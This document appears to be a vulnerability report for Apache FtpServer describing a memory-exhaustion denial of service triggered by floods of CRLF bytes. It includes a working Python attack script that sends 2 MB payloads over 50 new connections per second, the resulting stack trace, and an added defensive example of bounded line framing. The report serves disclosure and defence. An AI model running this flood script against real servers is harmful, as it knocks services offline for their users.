Details
Description
Hi, I found that the memory of FtpServer can easily be filled up with a lot of "\r\n" sequences. Sending a long sequence containing a lot of "\r\n" to the server can easily make the server's Java heap space run out of memory and make the server unavailable. It seems there is an issue in the memory control and command processing. This may be a threat that attackers could exploit to perform a DoS attack.
A similar threat can be seen in CVE-2017-7651: https://bugs.eclipse.org/bugs/show_bug.cgi?id=529754
Note that simply sending the server a long sequence of arbitrary characters other than "\r\n" does not cause the same condition.
Attack simulation
Run the server:
bin/ftpd.sh
Run the attack script.
The attack script (in Python) looks like this:

import socket
import threading
import time

ip_address = "0.0.0.0"        # target host (the local server in this test)
port = 21                     # FtpServer control port
payload = b"\r\n" * 1000000   # works: triggers the OutOfMemoryError
# payload = b"aa" * 1000000   # does not work: same size, but no "\r\n"

def send_attack():
    # one connection, one 2 MB payload, then close
    soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    soc.connect((ip_address, port))
    soc.sendall(payload)
    soc.close()

# open 50 new connections every second, each sending the payload
while True:
    for i in range(50):
        t = threading.Thread(target=send_attack)
        t.daemon = True
        t.start()
    time.sleep(1)
Result
The server becomes unavailable and outputs:

Exception in thread "pool-1-thread-39" java.lang.OutOfMemoryError: Java heap space
    at java.nio.HeapByteBuffer.<init>(HeapByteBuffer.java:57)
    at java.nio.ByteBuffer.allocate(ByteBuffer.java:335)
    at org.apache.mina.core.buffer.SimpleBufferAllocator.allocateNioBuffer(SimpleBufferAllocator.java:42)
    at org.apache.mina.core.buffer.SimpleBufferAllocator.allocate(SimpleBufferAllocator.java:34)
    at org.apache.mina.core.buffer.IoBuffer.allocate(IoBuffer.java:235)
    at org.apache.mina.core.buffer.IoBuffer.allocate(IoBuffer.java:218)
    at org.apache.mina.core.polling.AbstractPollingIoProcessor.read(AbstractPollingIoProcessor.java:508)
    at org.apache.mina.core.polling.AbstractPollingIoProcessor.access$1200(AbstractPollingIoProcessor.java:68)
    at org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.process(AbstractPollingIoProcessor.java:1224)
    at org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.process(AbstractPollingIoProcessor.java:1213)
    at org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.run(AbstractPollingIoProcessor.java:683)
    at org.apache.mina.util.NamePreservingRunnable.run(NamePreservingRunnable.java:64)
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
    at java.lang.Thread.run(Thread.java:750)
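The "memory control" the description says is missing comes down to two per-session bounds on a CRLF-delimited command channel: the length of an unterminated line, and the number of decoded commands waiting for the handler. The block below is an added illustration of those bounds, not code from this report or from Apache FtpServer or Apache MINA, and it makes no claim about where in FtpServer the actual allocation goes unbounded. It replays the two payload shapes from the attack script (the "\r\n" flood and the "aa" flood, constructed here in the same sizes) through a small bounded decoder. The limits (512-byte lines, 32 queued commands), the 1 KiB read size, and the "stalled handler" switch that models a command thread that cannot keep up are all hypothetical choices for the example.

```python
"""Bounded CRLF command framing, replayed against the report's two payloads.

Added example, not Apache FtpServer / MINA code. Limits, read size and the
stalled-handler model are hypothetical choices for the illustration.
"""
from collections import deque

CRLF = b"\r\n"

# Constructed payloads, shaped like the two in the report's attack script.
CRLF_FLOOD = CRLF * 1_000_000     # the payload that produced the OutOfMemoryError
JUNK_FLOOD = b"aa" * 1_000_000    # same size, no CRLF; reported as harmless


class FloodRejected(Exception):
    """A peer exceeded a per-session limit; close the connection, allocate nothing more."""


class LineDecoder:
    """Splits a CRLF-delimited stream into lines, capping the unterminated tail.

    The only state kept between reads is the tail of the current line, so a
    peer that never sends CRLF cannot grow the buffer past max_line_bytes.
    """

    def __init__(self, max_line_bytes=512):
        self.max_line_bytes = max_line_bytes
        self._tail = b""

    def feed(self, data, on_line):
        # The tail is bounded, so this copy is bounded; prepending it also
        # catches a CRLF that straddles two reads ("\r" in one, "\n" in the next).
        buf = self._tail + data
        start = 0
        while True:
            idx = buf.find(CRLF, start)
            if idx < 0:
                self._tail = buf[start:]
                if len(self._tail) > self.max_line_bytes:
                    raise FloodRejected(
                        f"line exceeds {self.max_line_bytes} bytes with no CRLF")
                return
            line = buf[start:idx]
            if len(line) > self.max_line_bytes:
                raise FloodRejected(f"line exceeds {self.max_line_bytes} bytes")
            on_line(line)
            start = idx + 2


class CommandSession:
    """Per-connection state: decoded commands wait in a bounded queue.

    stalled=True models a command handler that cannot keep up, which is when a
    flood of cheap "\r\n" commands would otherwise pile up in memory;
    stalled=False models a handler that consumes each command as it is decoded.
    """

    def __init__(self, stalled=False, max_pending=32, max_line_bytes=512):
        self.decoder = LineDecoder(max_line_bytes)
        self.stalled = stalled
        self.max_pending = max_pending
        self.pending = deque()
        self.peak_pending = 0
        self.processed = 0

    def on_read(self, data):
        self.decoder.feed(data, self._dispatch)

    def _dispatch(self, line):
        if not self.stalled:
            self.processed += 1      # handled immediately; nothing accumulates
            return
        if len(self.pending) >= self.max_pending:
            raise FloodRejected(
                f"more than {self.max_pending} unprocessed commands; closing session")
        self.pending.append(line)
        self.peak_pending = max(self.peak_pending, len(self.pending))


def simulate(payload, stalled_handler, chunk=1024):
    """Feed payload to one session in socket-sized reads.

    Returns (commands processed, peak queued commands, rejection reason or None).
    """
    session = CommandSession(stalled=stalled_handler)
    for off in range(0, len(payload), chunk):
        try:
            session.on_read(payload[off:off + chunk])
        except FloodRejected as exc:
            return session.processed, session.peak_pending, str(exc)
    return session.processed, session.peak_pending, None


if __name__ == "__main__":
    for name, payload in (("CRLF flood", CRLF_FLOOD), ("junk flood", JUNK_FLOOD)):
        for stalled in (True, False):
            label = "stalled handler" if stalled else "handler keeps up"
            print(name, label, simulate(payload, stalled))
    print("normal session", simulate(b"USER anonymous\r\nPASS guest@\r\n", False))
```

With a stalled handler the "\r\n" flood is cut off after 32 queued empty commands, and the "aa" flood is cut off as soon as 1 KiB arrives without a line terminator; with a handler that keeps up, the million empty commands are each handled and discarded with nothing retained between reads. The two checks are deliberately independent: the line-length cap protects against a never-terminated line, and the queue cap protects against many tiny lines, which is the shape of this report's payload. Whatever the limits, the session must be closed on violation rather than just logged, otherwise the peer simply reconnects and continues.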